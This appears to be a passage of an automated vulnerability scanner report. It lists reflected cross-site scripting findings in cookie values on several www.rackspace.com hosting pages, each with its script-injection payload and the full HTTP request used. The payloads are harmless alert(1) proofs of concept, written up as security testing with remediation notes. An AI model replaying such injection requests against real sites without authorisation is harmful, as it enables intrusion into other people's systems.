IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1386"><script>alert(1)</script>38a36f10c89 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc1386"><script>alert(1)</script>38a36f10c89; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f4ef"%3balert(1)//ed1913e32fa was submitted in the chatslider cookie. This input was echoed as 4f4ef";alert(1)//ed1913e32fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4f4ef"%3balert(1)//ed1913e32fa; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the lpUASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b79"><script>alert(1)</script>f9b7c80a68a was submitted in the lpUASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d7b79"><script>alert(1)</script>f9b7c80a68a; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1763b"><script>alert(1)</script>40d75046632 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/private_cloud/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81763b"><script>alert(1)</script>40d75046632; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582a9"%3balert(1)//3f27cc85235 was submitted in the IS_UASrackuid cookie. This input was echoed as 582a9";alert(1)//3f27cc85235 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/private_cloud/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8582a9"%3balert(1)//3f27cc85235; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a907d"><script>alert(1)</script>b0be67e0e68 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/private_cloud/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Da907d"><script>alert(1)</script>b0be67e0e68; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdb07"%3balert(1)//a8945a03e75 was submitted in the chatslider cookie. This input was echoed as fdb07";alert(1)//a8945a03e75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/private_cloud/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dfdb07"%3balert(1)//a8945a03e75; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da3b"%3balert(1)//9d4cf39c56b was submitted in the IS_UASrackuid cookie. This input was echoed as 3da3b";alert(1)//9d4cf39c56b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/richmedia/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83da3b"%3balert(1)//9d4cf39c56b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cfd5"><script>alert(1)</script>209dafe0ea3 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/richmedia/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83cfd5"><script>alert(1)</script>209dafe0ea3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28ba8"><script>alert(1)</script>07d40e423d7 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/richmedia/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D28ba8"><script>alert(1)</script>07d40e423d7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ff18"%3balert(1)//9c2b8dcbef7 was submitted in the chatslider cookie. This input was echoed as 1ff18";alert(1)//9c2b8dcbef7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/richmedia/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1ff18"%3balert(1)//9c2b8dcbef7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff4da"%3balert(1)//9ce94872ae3 was submitted in the IS_UASrackuid cookie. This input was echoed as ff4da";alert(1)//9ce94872ae3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/saas/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ff4da"%3balert(1)//9ce94872ae3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e4b"><script>alert(1)</script>666321f28cc was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/saas/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e1e4b"><script>alert(1)</script>666321f28cc; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69814"%3balert(1)//84f738c2ee7 was submitted in the chatslider cookie. This input was echoed as 69814";alert(1)//84f738c2ee7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
